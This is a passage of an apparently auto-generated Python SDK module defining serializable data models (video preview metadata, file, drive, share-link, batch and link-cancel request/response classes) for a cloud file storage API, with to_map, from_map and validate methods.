        self.duration = duration
        # sample_rate
        self.sample_rate = sample_rate

    def validate(self):
        pass

    def to_map(self):
        # Emit only the fields that are set, preserving declaration order.
        return {
            key: getattr(self, key)
            for key in self._FIELDS
            if getattr(self, key) is not None
        }

    def from_map(self, m: dict = None):
        source = m or {}
        for key in self._FIELDS:
            if source.get(key) is not None:
                setattr(self, key, source.get(key))
        return self
class VideoPreviewAudioMusicMeta(TeaModel):
    """Music metadata (album/artist/title/cover) of a video preview's audio."""

    # Serialized keys are identical to attribute names, in declaration order.
    _FIELDS = ('album', 'artist', 'cover_url', 'title')

    def __init__(
        self,
        album: str = None,
        artist: str = None,
        cover_url: str = None,
        title: str = None,
    ):
        # album
        self.album = album
        # artist
        self.artist = artist
        # cover_url
        self.cover_url = cover_url
        # title
        self.title = title

    def validate(self):
        pass

    def to_map(self):
        # Emit only the fields that are set, preserving declaration order.
        return {
            key: getattr(self, key)
            for key in self._FIELDS
            if getattr(self, key) is not None
        }

    def from_map(self, m: dict = None):
        source = m or {}
        for key in self._FIELDS:
            if source.get(key) is not None:
                setattr(self, key, source.get(key))
        return self
class VideoPreviewTranscode(TeaModel):
    """Transcode template entry of a video preview (template id + status)."""

    # Serialized keys are identical to attribute names, in declaration order.
    _FIELDS = ('status', 'template_id')

    def __init__(
        self,
        status: str = None,
        template_id: str = None,
    ):
        # status
        self.status = status
        # template_id
        self.template_id = template_id

    def validate(self):
        pass

    def to_map(self):
        # Emit only the fields that are set, preserving declaration order.
        return {
            key: getattr(self, key)
            for key in self._FIELDS
            if getattr(self, key) is not None
        }

    def from_map(self, m: dict = None):
        source = m or {}
        for key in self._FIELDS:
            if source.get(key) is not None:
                setattr(self, key, source.get(key))
        return self
class VideoPreviewSprite(TeaModel):
    """Sprite (thumbnail frame grid) information of a video preview."""

    # Serialized keys are identical to attribute names, in declaration order.
    _FIELDS = (
        'col', 'count', 'frame_count', 'frame_height',
        'frame_width', 'row', 'status',
    )

    def __init__(
        self,
        col: int = None,
        count: int = None,
        frame_count: int = None,
        frame_height: int = None,
        frame_width: int = None,
        row: int = None,
        status: str = None,
    ):
        # col
        self.col = col
        # count
        self.count = count
        # frame_count
        self.frame_count = frame_count
        # frame_height
        self.frame_height = frame_height
        # frame_width
        self.frame_width = frame_width
        # row
        self.row = row
        # status
        self.status = status

    def validate(self):
        pass

    def to_map(self):
        # Emit only the fields that are set, preserving declaration order.
        return {
            key: getattr(self, key)
            for key in self._FIELDS
            if getattr(self, key) is not None
        }

    def from_map(self, m: dict = None):
        source = m or {}
        for key in self._FIELDS:
            if source.get(key) is not None:
                setattr(self, key, source.get(key))
        return self
class VideoPreviewResponse(TeaModel):
    """Video preview metadata: stream parameters, transcode template
    states, sprite info and audio metadata."""

    def __init__(
        self,
        audio_channels: int = None,
        audio_format: str = None,
        audio_meta: VideoPreviewAudioMeta = None,
        audio_music_meta: VideoPreviewAudioMusicMeta = None,
        audio_sample_rate: str = None,
        audio_template_list: List[VideoPreviewTranscode] = None,
        bitrate: str = None,
        duration: str = None,
        frame_rate: str = None,
        height: int = None,
        sprite_info: VideoPreviewSprite = None,
        template_list: List[VideoPreviewTranscode] = None,
        thumbnail: str = None,
        video_format: str = None,
        width: int = None,
    ):
        # audio_channels
        self.audio_channels = audio_channels
        # audio_format
        self.audio_format = audio_format
        # audio stream metadata
        self.audio_meta = audio_meta
        # music metadata (album/artist/title/cover)
        self.audio_music_meta = audio_music_meta
        # audio_sample_rate
        self.audio_sample_rate = audio_sample_rate
        # audio transcode template entries
        self.audio_template_list = audio_template_list
        # bitrate
        self.bitrate = bitrate
        # duration
        self.duration = duration
        # frame_rate
        self.frame_rate = frame_rate
        # height
        self.height = height
        # sprite (frame grid) info
        self.sprite_info = sprite_info
        # video transcode template entries
        self.template_list = template_list
        # thumbnail
        self.thumbnail = thumbnail
        # video_format
        self.video_format = video_format
        # width
        self.width = width

    def validate(self):
        # Recursively validate nested models when present.
        if self.audio_meta:
            self.audio_meta.validate()
        if self.audio_music_meta:
            self.audio_music_meta.validate()
        for entry in self.audio_template_list or []:
            if entry:
                entry.validate()
        if self.sprite_info:
            self.sprite_info.validate()
        for entry in self.template_list or []:
            if entry:
                entry.validate()

    def to_map(self):
        data = dict()
        if self.audio_channels is not None:
            data['audio_channels'] = self.audio_channels
        if self.audio_format is not None:
            data['audio_format'] = self.audio_format
        if self.audio_meta is not None:
            data['audio_meta'] = self.audio_meta.to_map()
        if self.audio_music_meta is not None:
            data['audio_music_meta'] = self.audio_music_meta.to_map()
        if self.audio_sample_rate is not None:
            data['audio_sample_rate'] = self.audio_sample_rate
        # List keys are always emitted, even when empty.
        data['audio_template_list'] = []
        if self.audio_template_list is not None:
            data['audio_template_list'] = [
                entry.to_map() if entry else None
                for entry in self.audio_template_list
            ]
        if self.bitrate is not None:
            data['bitrate'] = self.bitrate
        if self.duration is not None:
            data['duration'] = self.duration
        if self.frame_rate is not None:
            data['frame_rate'] = self.frame_rate
        if self.height is not None:
            data['height'] = self.height
        if self.sprite_info is not None:
            data['sprite_info'] = self.sprite_info.to_map()
        data['template_list'] = []
        if self.template_list is not None:
            data['template_list'] = [
                entry.to_map() if entry else None
                for entry in self.template_list
            ]
        if self.thumbnail is not None:
            data['thumbnail'] = self.thumbnail
        if self.video_format is not None:
            data['video_format'] = self.video_format
        if self.width is not None:
            data['width'] = self.width
        return data

    def from_map(self, m: dict = None):
        source = m or dict()
        if source.get('audio_channels') is not None:
            self.audio_channels = source.get('audio_channels')
        if source.get('audio_format') is not None:
            self.audio_format = source.get('audio_format')
        if source.get('audio_meta') is not None:
            self.audio_meta = VideoPreviewAudioMeta().from_map(source.get('audio_meta'))
        if source.get('audio_music_meta') is not None:
            self.audio_music_meta = VideoPreviewAudioMusicMeta().from_map(
                source.get('audio_music_meta'))
        if source.get('audio_sample_rate') is not None:
            self.audio_sample_rate = source.get('audio_sample_rate')
        # List attributes are always reset, even when the key is absent.
        self.audio_template_list = []
        if source.get('audio_template_list') is not None:
            self.audio_template_list = [
                VideoPreviewTranscode().from_map(entry)
                for entry in source.get('audio_template_list')
            ]
        if source.get('bitrate') is not None:
            self.bitrate = source.get('bitrate')
        if source.get('duration') is not None:
            self.duration = source.get('duration')
        if source.get('frame_rate') is not None:
            self.frame_rate = source.get('frame_rate')
        if source.get('height') is not None:
            self.height = source.get('height')
        if source.get('sprite_info') is not None:
            self.sprite_info = VideoPreviewSprite().from_map(source.get('sprite_info'))
        self.template_list = []
        if source.get('template_list') is not None:
            self.template_list = [
                VideoPreviewTranscode().from_map(entry)
                for entry in source.get('template_list')
            ]
        if source.get('thumbnail') is not None:
            self.thumbnail = source.get('thumbnail')
        if source.get('video_format') is not None:
            self.video_format = source.get('video_format')
        if source.get('width') is not None:
            self.width = source.get('width')
        return self
class BaseCCPFileResponse(TeaModel):
    """Base file response.

    Describes a file or folder entry: identity (domain/drive/file ids),
    content hashes, media metadata (image/video/preview), and lifecycle
    fields (status, trashed_at, labels, ...).  ``to_map``/``from_map``
    convert between the model and its wire-format dict; nested models are
    serialized recursively.
    """
    def __init__(
        self,
        category: str = None,
        characteristic_hash: str = None,
        content_hash: str = None,
        content_hash_name: str = None,
        content_type: str = None,
        crc_64hash: str = None,
        created_at: str = None,
        description: str = None,
        domain_id: str = None,
        download_url: str = None,
        drive_id: str = None,
        encrypt_mode: str = None,
        file_extension: str = None,
        file_id: str = None,
        hidden: bool = None,
        image_media_metadata: ImageMediaResponse = None,
        labels: List[str] = None,
        meta: str = None,
        name: str = None,
        parent_file_id: str = None,
        punish_flag: int = None,
        share_id: str = None,
        size: int = None,
        starred: bool = None,
        status: str = None,
        streams_info: dict = None,
        thumbnail: str = None,
        trashed_at: str = None,
        type: str = None,
        updated_at: str = None,
        upload_id: str = None,
        url: str = None,
        user_meta: str = None,
        video_media_metadata: VideoMediaResponse = None,
        video_preview_metadata: VideoPreviewResponse = None,
    ):
        # category
        self.category = category
        # CharacteristicHash
        self.characteristic_hash = characteristic_hash
        # Content Hash
        self.content_hash = content_hash
        # content_hash_name
        self.content_hash_name = content_hash_name
        # content_type
        self.content_type = content_type
        # crc64_hash (note: serialized key is 'crc64_hash')
        self.crc_64hash = crc_64hash
        # created_at
        self.created_at = created_at
        # description
        self.description = description
        # DomainID
        self.domain_id = domain_id
        # download_url
        self.download_url = download_url
        # drive_id
        self.drive_id = drive_id
        # encrypt_mode
        self.encrypt_mode = encrypt_mode
        # file_extension
        self.file_extension = file_extension
        # file_id
        self.file_id = file_id
        # Hidden (boolean)
        self.hidden = hidden
        # image media metadata (nested model)
        self.image_media_metadata = image_media_metadata
        # labels
        self.labels = labels
        # meta
        self.meta = meta
        # name
        self.name = name
        # parent_file_id
        self.parent_file_id = parent_file_id
        # punish_flag
        self.punish_flag = punish_flag
        # share_id
        self.share_id = share_id
        # Size
        self.size = size
        # starred (boolean)
        self.starred = starred
        # status
        self.status = status
        # @Deprecated streams url info
        self.streams_info = streams_info
        # thumbnail
        self.thumbnail = thumbnail
        # trashed_at
        self.trashed_at = trashed_at
        # type (parameter name shadows the builtin; kept for API compatibility)
        self.type = type
        # updated_at
        self.updated_at = updated_at
        # upload_id
        self.upload_id = upload_id
        # url
        self.url = url
        # user_meta
        self.user_meta = user_meta
        # video media metadata (nested model)
        self.video_media_metadata = video_media_metadata
        # video preview metadata (nested model)
        self.video_preview_metadata = video_preview_metadata
    def validate(self):
        # Pattern/length constraints on ids, required name, size bounds,
        # then recursive validation of nested media models.
        if self.domain_id is not None:
            self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
        if self.image_media_metadata:
            self.image_media_metadata.validate()
        self.validate_required(self.name, 'name')
        if self.name is not None:
            self.validate_pattern(self.name, 'name', '[a-zA-Z0-9.-]{1,1000}')
        if self.parent_file_id is not None:
            self.validate_max_length(self.parent_file_id, 'parent_file_id', 50)
            self.validate_pattern(self.parent_file_id, 'parent_file_id', '[a-z0-9]{1,50}')
        if self.size is not None:
            self.validate_maximum(self.size, 'size', 53687091200)
            self.validate_minimum(self.size, 'size', 0)
        if self.video_media_metadata:
            self.video_media_metadata.validate()
        if self.video_preview_metadata:
            self.video_preview_metadata.validate()
    def to_map(self):
        # Emit only the fields that are set; nested models serialize via
        # their own to_map().
        result = dict()
        if self.category is not None:
            result['category'] = self.category
        if self.characteristic_hash is not None:
            result['characteristic_hash'] = self.characteristic_hash
        if self.content_hash is not None:
            result['content_hash'] = self.content_hash
        if self.content_hash_name is not None:
            result['content_hash_name'] = self.content_hash_name
        if self.content_type is not None:
            result['content_type'] = self.content_type
        if self.crc_64hash is not None:
            result['crc64_hash'] = self.crc_64hash
        if self.created_at is not None:
            result['created_at'] = self.created_at
        if self.description is not None:
            result['description'] = self.description
        if self.domain_id is not None:
            result['domain_id'] = self.domain_id
        if self.download_url is not None:
            result['download_url'] = self.download_url
        if self.drive_id is not None:
            result['drive_id'] = self.drive_id
        if self.encrypt_mode is not None:
            result['encrypt_mode'] = self.encrypt_mode
        if self.file_extension is not None:
            result['file_extension'] = self.file_extension
        if self.file_id is not None:
            result['file_id'] = self.file_id
        if self.hidden is not None:
            result['hidden'] = self.hidden
        if self.image_media_metadata is not None:
            result['image_media_metadata'] = self.image_media_metadata.to_map()
        if self.labels is not None:
            result['labels'] = self.labels
        if self.meta is not None:
            result['meta'] = self.meta
        if self.name is not None:
            result['name'] = self.name
        if self.parent_file_id is not None:
            result['parent_file_id'] = self.parent_file_id
        if self.punish_flag is not None:
            result['punish_flag'] = self.punish_flag
        if self.share_id is not None:
            result['share_id'] = self.share_id
        if self.size is not None:
            result['size'] = self.size
        if self.starred is not None:
            result['starred'] = self.starred
        if self.status is not None:
            result['status'] = self.status
        if self.streams_info is not None:
            result['streams_info'] = self.streams_info
        if self.thumbnail is not None:
            result['thumbnail'] = self.thumbnail
        if self.trashed_at is not None:
            result['trashed_at'] = self.trashed_at
        if self.type is not None:
            result['type'] = self.type
        if self.updated_at is not None:
            result['updated_at'] = self.updated_at
        if self.upload_id is not None:
            result['upload_id'] = self.upload_id
        if self.url is not None:
            result['url'] = self.url
        if self.user_meta is not None:
            result['user_meta'] = self.user_meta
        if self.video_media_metadata is not None:
            result['video_media_metadata'] = self.video_media_metadata.to_map()
        if self.video_preview_metadata is not None:
            result['video_preview_metadata'] = self.video_preview_metadata.to_map()
        return result
    def from_map(self, m: dict = None):
        # Populate from a wire-format dict; nested models deserialize via
        # their own from_map().
        m = m or dict()
        if m.get('category') is not None:
            self.category = m.get('category')
        if m.get('characteristic_hash') is not None:
            self.characteristic_hash = m.get('characteristic_hash')
        if m.get('content_hash') is not None:
            self.content_hash = m.get('content_hash')
        if m.get('content_hash_name') is not None:
            self.content_hash_name = m.get('content_hash_name')
        if m.get('content_type') is not None:
            self.content_type = m.get('content_type')
        if m.get('crc64_hash') is not None:
            self.crc_64hash = m.get('crc64_hash')
        if m.get('created_at') is not None:
            self.created_at = m.get('created_at')
        if m.get('description') is not None:
            self.description = m.get('description')
        if m.get('domain_id') is not None:
            self.domain_id = m.get('domain_id')
        if m.get('download_url') is not None:
            self.download_url = m.get('download_url')
        if m.get('drive_id') is not None:
            self.drive_id = m.get('drive_id')
        if m.get('encrypt_mode') is not None:
            self.encrypt_mode = m.get('encrypt_mode')
        if m.get('file_extension') is not None:
            self.file_extension = m.get('file_extension')
        if m.get('file_id') is not None:
            self.file_id = m.get('file_id')
        if m.get('hidden') is not None:
            self.hidden = m.get('hidden')
        if m.get('image_media_metadata') is not None:
            temp_model = ImageMediaResponse()
            self.image_media_metadata = temp_model.from_map(m['image_media_metadata'])
        if m.get('labels') is not None:
            self.labels = m.get('labels')
        if m.get('meta') is not None:
            self.meta = m.get('meta')
        if m.get('name') is not None:
            self.name = m.get('name')
        if m.get('parent_file_id') is not None:
            self.parent_file_id = m.get('parent_file_id')
        if m.get('punish_flag') is not None:
            self.punish_flag = m.get('punish_flag')
        if m.get('share_id') is not None:
            self.share_id = m.get('share_id')
        if m.get('size') is not None:
            self.size = m.get('size')
        if m.get('starred') is not None:
            self.starred = m.get('starred')
        if m.get('status') is not None:
            self.status = m.get('status')
        if m.get('streams_info') is not None:
            self.streams_info = m.get('streams_info')
        if m.get('thumbnail') is not None:
            self.thumbnail = m.get('thumbnail')
        if m.get('trashed_at') is not None:
            self.trashed_at = m.get('trashed_at')
        if m.get('type') is not None:
            self.type = m.get('type')
        if m.get('updated_at') is not None:
            self.updated_at = m.get('updated_at')
        if m.get('upload_id') is not None:
            self.upload_id = m.get('upload_id')
        if m.get('url') is not None:
            self.url = m.get('url')
        if m.get('user_meta') is not None:
            self.user_meta = m.get('user_meta')
        if m.get('video_media_metadata') is not None:
            temp_model = VideoMediaResponse()
            self.video_media_metadata = temp_model.from_map(m['video_media_metadata'])
        if m.get('video_preview_metadata') is not None:
            temp_model = VideoPreviewResponse()
            self.video_preview_metadata = temp_model.from_map(m['video_preview_metadata'])
        return self
class BaseDriveResponse(TeaModel):
    """Base drive response: identity, ownership, encryption and quota
    information of a drive."""

    # Serialized keys are identical to attribute names, in declaration order.
    _FIELDS = (
        'creator', 'description', 'domain_id', 'drive_id', 'drive_name',
        'drive_type', 'encrypt_data_access', 'encrypt_mode', 'owner',
        'relative_path', 'status', 'store_id', 'total_size', 'used_size',
    )

    def __init__(
        self,
        creator: str = None,
        description: str = None,
        domain_id: str = None,
        drive_id: str = None,
        drive_name: str = None,
        drive_type: str = None,
        encrypt_data_access: bool = None,
        encrypt_mode: str = None,
        owner: str = None,
        relative_path: str = None,
        status: str = None,
        store_id: str = None,
        total_size: int = None,
        used_size: int = None,
    ):
        # creator of the drive
        self.creator = creator
        # drive description / remarks
        self.description = description
        # Domain ID
        self.domain_id = domain_id
        # Drive ID
        self.drive_id = drive_id
        # drive name
        self.drive_name = drive_name
        # drive type
        self.drive_type = drive_type
        # whether encrypted data access is enabled
        self.encrypt_data_access = encrypt_data_access
        # encryption mode
        self.encrypt_mode = encrypt_mode
        # owner of the drive
        self.owner = owner
        # drive storage path relative to the store; returned when the
        # domain's PathType is OSSPath
        self.relative_path = relative_path
        # drive status
        self.status = status
        # store ID; returned when the domain's PathType is OSSPath
        self.store_id = store_id
        # total drive capacity
        self.total_size = total_size
        # used drive capacity
        self.used_size = used_size

    def validate(self):
        pass

    def to_map(self):
        # Emit only the fields that are set, preserving declaration order.
        return {
            key: getattr(self, key)
            for key in self._FIELDS
            if getattr(self, key) is not None
        }

    def from_map(self, m: dict = None):
        source = m or {}
        for key in self._FIELDS:
            if source.get(key) is not None:
                setattr(self, key, source.get(key))
        return self
class BaseFileAnonymousResponse(TeaModel):
    """Base response item for list_file_by_anonymous."""

    # Serialized keys are identical to attribute names, in declaration order.
    _FIELDS = ('file_id', 'name', 'size', 'thumbnail', 'type', 'updated_at')

    def __init__(
        self,
        file_id: str = None,
        name: str = None,
        size: int = None,
        thumbnail: str = None,
        type: str = None,
        updated_at: str = None,
    ):
        # file_id
        self.file_id = file_id
        # name
        self.name = name
        # size; only meaningful when type == 'file'
        self.size = size
        # thumbnail
        self.thumbnail = thumbnail
        # type (parameter name shadows the builtin; kept for API compatibility)
        self.type = type
        # updated_at
        self.updated_at = updated_at

    def validate(self):
        # Length/pattern constraints on id and name, bounds on size.
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
        if self.name is not None:
            self.validate_pattern(self.name, 'name', '[a-zA-Z0-9.-]{1,1000}')
        if self.size is not None:
            self.validate_maximum(self.size, 'size', 53687091200)
            self.validate_minimum(self.size, 'size', 0)

    def to_map(self):
        # Emit only the fields that are set, preserving declaration order.
        return {
            key: getattr(self, key)
            for key in self._FIELDS
            if getattr(self, key) is not None
        }

    def from_map(self, m: dict = None):
        source = m or {}
        for key in self._FIELDS:
            if source.get(key) is not None:
                setattr(self, key, source.get(key))
        return self
class BaseHostingFileResponse(TeaModel):
    """Base file response (hosting / path-addressed mode)."""

    # Attribute names in serialization order.  Every attribute maps to a
    # wire key of the same name except crc_64hash, whose key is 'crc64_hash'.
    _ATTRS = (
        'content_hash', 'content_hash_name', 'content_type', 'crc_64hash',
        'created_at', 'description', 'domain_id', 'download_url', 'drive_id',
        'file_extension', 'file_path', 'name', 'parent_file_path', 'share_id',
        'size', 'status', 'thumbnail', 'trashed_at', 'type', 'updated_at',
        'upload_id', 'url',
    )

    @staticmethod
    def _wire_key(attr):
        # crc_64hash is the only attribute whose map key differs.
        return 'crc64_hash' if attr == 'crc_64hash' else attr

    def __init__(
        self,
        content_hash: str = None,
        content_hash_name: str = None,
        content_type: str = None,
        crc_64hash: str = None,
        created_at: str = None,
        description: str = None,
        domain_id: str = None,
        download_url: str = None,
        drive_id: str = None,
        file_extension: str = None,
        file_path: str = None,
        name: str = None,
        parent_file_path: str = None,
        share_id: str = None,
        size: int = None,
        status: str = None,
        thumbnail: str = None,
        trashed_at: str = None,
        type: str = None,
        updated_at: str = None,
        upload_id: str = None,
        url: str = None,
    ):
        # content hash
        self.content_hash = content_hash
        # content_hash_name
        self.content_hash_name = content_hash_name
        # content_type
        self.content_type = content_type
        # crc64_hash (serialized under the wire key 'crc64_hash')
        self.crc_64hash = crc_64hash
        # created_at
        self.created_at = created_at
        # description
        self.description = description
        # domain_id
        self.domain_id = domain_id
        # download_url
        self.download_url = download_url
        # drive_id
        self.drive_id = drive_id
        # file_extension
        self.file_extension = file_extension
        # file_path
        self.file_path = file_path
        # name
        self.name = name
        # parent_file_path
        self.parent_file_path = parent_file_path
        # share_id
        self.share_id = share_id
        # size
        self.size = size
        # status
        self.status = status
        # thumbnail
        self.thumbnail = thumbnail
        # trashed_at
        self.trashed_at = trashed_at
        # type
        self.type = type
        # updated_at
        self.updated_at = updated_at
        # upload_id
        self.upload_id = upload_id
        # url
        self.url = url

    def validate(self):
        """Enforce the schema constraints; ``name`` is required."""
        if self.domain_id is not None:
            self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.name, 'name')
        if self.name is not None:
            self.validate_pattern(self.name, 'name', '[a-zA-Z0-9.-]{1,1000}')
        if self.parent_file_path is not None:
            self.validate_max_length(self.parent_file_path, 'parent_file_path', 50)
            self.validate_pattern(self.parent_file_path, 'parent_file_path', '[a-z0-9]{1,50}')
        if self.share_id is not None:
            self.validate_pattern(self.share_id, 'share_id', '[0-9]+')
        if self.size is not None:
            self.validate_maximum(self.size, 'size', 53687091200)
            self.validate_minimum(self.size, 'size', 0)

    def to_map(self):
        """Serialize the non-None attributes into a plain dict."""
        result = dict()
        for attr in self._ATTRS:
            value = getattr(self, attr)
            if value is not None:
                result[self._wire_key(attr)] = value
        return result

    def from_map(self, m: dict = None):
        """Load attributes from ``m``; missing/None keys are ignored."""
        m = m or dict()
        for attr in self._ATTRS:
            value = m.get(self._wire_key(attr))
            if value is not None:
                setattr(self, attr, value)
        return self
class BaseShareLinkResponse(TeaModel):
    """Single entry in a list_share_link response."""

    # Attribute names double as wire keys, in serialization order.
    _ATTRS = (
        'created_at', 'creator', 'description', 'download_count', 'drive_id',
        'expiration', 'expired', 'file_id', 'file_id_list', 'file_path_list',
        'preview_count', 'save_count', 'share_id', 'share_msg', 'share_name',
        'share_policy', 'share_pwd', 'share_url', 'updated_at',
    )

    def __init__(
        self,
        created_at: str = None,
        creator: str = None,
        description: str = None,
        download_count: int = None,
        drive_id: str = None,
        expiration: str = None,
        expired: bool = None,
        file_id: str = None,
        file_id_list: List[str] = None,
        file_path_list: List[str] = None,
        preview_count: int = None,
        save_count: int = None,
        share_id: str = None,
        share_msg: str = None,
        share_name: str = None,
        share_policy: str = None,
        share_pwd: str = None,
        share_url: str = None,
        updated_at: str = None,
    ):
        # created_at
        self.created_at = created_at
        # creator
        self.creator = creator
        # description
        self.description = description
        # number of downloads
        self.download_count = download_count
        # drive_id
        self.drive_id = drive_id
        # expiration
        self.expiration = expiration
        # expired
        self.expired = expired
        # file_id
        self.file_id = file_id
        # file_id_list
        self.file_id_list = file_id_list
        # file_path_list
        self.file_path_list = file_path_list
        # preview_count
        self.preview_count = preview_count
        # number of times the share content was saved (transferred)
        self.save_count = save_count
        # share_id
        self.share_id = share_id
        # share_msg
        self.share_msg = share_msg
        # share_name
        self.share_name = share_name
        # share_policy
        self.share_policy = share_policy
        # share_pwd
        self.share_pwd = share_pwd
        # share_url
        self.share_url = share_url
        # updated_at
        self.updated_at = updated_at

    def validate(self):
        """No constraints to enforce for this model."""
        pass

    def to_map(self):
        """Serialize the non-None attributes into a plain dict."""
        result = dict()
        for attr in self._ATTRS:
            value = getattr(self, attr)
            if value is not None:
                result[attr] = value
        return result

    def from_map(self, m: dict = None):
        """Load attributes from ``m``; missing/None keys are ignored."""
        m = m or dict()
        for attr in self._ATTRS:
            if m.get(attr) is not None:
                setattr(self, attr, m.get(attr))
        return self
class SharePermissionPolicy(TeaModel):
    """Permission policy entry attached to a file inside a share."""

    # Attribute names double as wire keys, in serialization order.
    _ATTRS = (
        'file_id', 'file_path', 'permission_inheritable',
        'permission_list', 'permission_type',
    )

    def __init__(
        self,
        file_id: str = None,
        file_path: str = None,
        permission_inheritable: bool = None,
        permission_list: List[str] = None,
        permission_type: str = None,
    ):
        # file_id
        self.file_id = file_id
        # file_path
        self.file_path = file_path
        # permission_inheritable flag
        self.permission_inheritable = permission_inheritable
        # permission_list
        self.permission_list = permission_list
        # permission_type
        self.permission_type = permission_type

    def validate(self):
        """No constraints to enforce for this model."""
        pass

    def to_map(self):
        """Serialize the non-None attributes into a plain dict."""
        result = dict()
        for attr in self._ATTRS:
            value = getattr(self, attr)
            if value is not None:
                result[attr] = value
        return result

    def from_map(self, m: dict = None):
        """Load attributes from ``m``; missing/None keys are ignored."""
        m = m or dict()
        for attr in self._ATTRS:
            if m.get(attr) is not None:
                setattr(self, attr, m.get(attr))
        return self
class BaseShareResponse(TeaModel):
    """Single entry in a list share response."""

    # Plain attributes serialized before the nested share_policy list,
    # then the trailing plain attributes, preserving original key order.
    _HEAD_ATTRS = (
        'created_at', 'creator', 'description', 'domain_id', 'drive_id',
        'expiration', 'expired', 'owner', 'permissions', 'share_file_id',
        'share_file_path', 'share_id', 'share_name',
    )
    _TAIL_ATTRS = ('status', 'updated_at')

    def __init__(
        self,
        created_at: str = None,
        creator: str = None,
        description: str = None,
        domain_id: str = None,
        drive_id: str = None,
        expiration: str = None,
        expired: bool = None,
        owner: str = None,
        permissions: List[str] = None,
        share_file_id: str = None,
        share_file_path: str = None,
        share_id: str = None,
        share_name: str = None,
        share_policy: List[SharePermissionPolicy] = None,
        status: str = None,
        updated_at: str = None,
    ):
        # created_at
        self.created_at = created_at
        # creator
        self.creator = creator
        # description
        self.description = description
        # domain_id
        self.domain_id = domain_id
        # drive_id
        self.drive_id = drive_id
        # expiration
        self.expiration = expiration
        # expired
        self.expired = expired
        # owner
        self.owner = owner
        # permissions
        self.permissions = permissions
        # share_file_id
        self.share_file_id = share_file_id
        # share_file_path
        self.share_file_path = share_file_path
        # share_id
        self.share_id = share_id
        # share_name
        self.share_name = share_name
        # nested per-file permission policies
        self.share_policy = share_policy
        # status
        self.status = status
        # updated_at
        self.updated_at = updated_at

    def validate(self):
        """Validate every non-empty nested share-policy entry."""
        for policy in self.share_policy or ():
            if policy:
                policy.validate()

    def to_map(self):
        """Serialize to a plain dict.

        The 'share_policy' key is always present (as a list, possibly
        empty); all other keys are emitted only when non-None.
        """
        result = dict()
        for attr in self._HEAD_ATTRS:
            value = getattr(self, attr)
            if value is not None:
                result[attr] = value
        result['share_policy'] = []
        if self.share_policy is not None:
            for policy in self.share_policy:
                result['share_policy'].append(policy.to_map() if policy else None)
        for attr in self._TAIL_ATTRS:
            value = getattr(self, attr)
            if value is not None:
                result[attr] = value
        return result

    def from_map(self, m: dict = None):
        """Load from ``m``; ``share_policy`` is reset to a fresh list."""
        m = m or dict()
        for attr in self._HEAD_ATTRS:
            if m.get(attr) is not None:
                setattr(self, attr, m.get(attr))
        self.share_policy = []
        if m.get('share_policy') is not None:
            for item in m.get('share_policy'):
                self.share_policy.append(SharePermissionPolicy().from_map(item))
        for attr in self._TAIL_ATTRS:
            if m.get(attr) is not None:
                setattr(self, attr, m.get(attr))
        return self
class BatchSubResponse(TeaModel):
    """Result of a single sub-request inside a batch operation."""

    # Attribute names double as wire keys, in serialization order.
    _ATTRS = ('body', 'id', 'status')

    def __init__(
        self,
        body: dict = None,
        id: str = None,
        status: int = None,
    ):
        # Result payload of the sub-request (JSON dict); see the
        # corresponding sub-request documentation for its schema.
        self.body = body
        # Echo of the id supplied in the request, used to correlate
        # this result with its sub-request.
        self.id = id
        # Status code of the sub-request; see the corresponding
        # sub-request documentation.
        self.status = status

    def validate(self):
        """No constraints to enforce for this model."""
        pass

    def to_map(self):
        """Serialize the non-None attributes into a plain dict."""
        result = dict()
        for attr in self._ATTRS:
            value = getattr(self, attr)
            if value is not None:
                result[attr] = value
        return result

    def from_map(self, m: dict = None):
        """Load attributes from ``m``; missing/None keys are ignored."""
        m = m or dict()
        for attr in self._ATTRS:
            if m.get(attr) is not None:
                setattr(self, attr, m.get(attr))
        return self
class BatchResponse(TeaModel):
    """Batch operation response: one sub-response per sub-request."""

    def __init__(
        self,
        responses: List[BatchSubResponse] = None,
    ):
        # Collected results of all sub-requests.
        self.responses = responses

    def validate(self):
        """Validate every non-empty sub-response."""
        for sub in self.responses or ():
            if sub:
                sub.validate()

    def to_map(self):
        """Serialize to a dict; 'responses' is always present as a list."""
        result = dict()
        result['responses'] = []
        if self.responses is not None:
            for sub in self.responses:
                result['responses'].append(sub.to_map() if sub else None)
        return result

    def from_map(self, m: dict = None):
        """Load from ``m``; ``responses`` is reset to a fresh list."""
        m = m or dict()
        self.responses = []
        if m.get('responses') is not None:
            for item in m.get('responses'):
                self.responses.append(BatchSubResponse().from_map(item))
        return self
class CancelLinkRequest(TeaModel):
    """Request to cancel the binding of a temporary link token."""

    # Attribute names double as wire keys, in serialization order.
    _ATTRS = ('headers', 'temporary_token')

    def __init__(
        self,
        headers: Dict[str, str] = None,
        temporary_token: str = None,
    ):
        self.headers = headers
        # Temporary token to unbind; this token can only access the
        # bind / unbind endpoints.
        self.temporary_token = temporary_token

    def validate(self):
        """``temporary_token`` is mandatory."""
        self.validate_required(self.temporary_token, 'temporary_token')

    def to_map(self):
        """Serialize the non-None attributes into a plain dict."""
        result = dict()
        for attr in self._ATTRS:
            value = getattr(self, attr)
            if value is not None:
                result[attr] = value
        return result

    def from_map(self, m: dict = None):
        """Load attributes from ``m``; missing/None keys are ignored."""
        m = m or dict()
        for attr in self._ATTRS:
            if m.get(attr) is not None:
                setattr(self, attr, m.get(attr))
        return self
class CompleteFileResponse(TeaModel):
    """Complete file response.

    Fix over the generated original: the constructor contained two bare
    annotation statements ``type: boolean`` (before ``hidden`` and
    ``starred``) that were clearly meant to be comments.  As local-variable
    annotations they were never evaluated (so they did not crash), but they
    annotated/shadowed the builtin ``type`` with an undefined name
    ``boolean``; they are now plain comments.
    """

    # Attribute names in serialization order.  crc_64hash maps to the wire
    # key 'crc64_hash'; the three *_metadata attributes hold nested models.
    _ATTRS = (
        'category', 'characteristic_hash', 'content_hash',
        'content_hash_name', 'content_type', 'crc_64hash', 'created_at',
        'description', 'domain_id', 'download_url', 'drive_id',
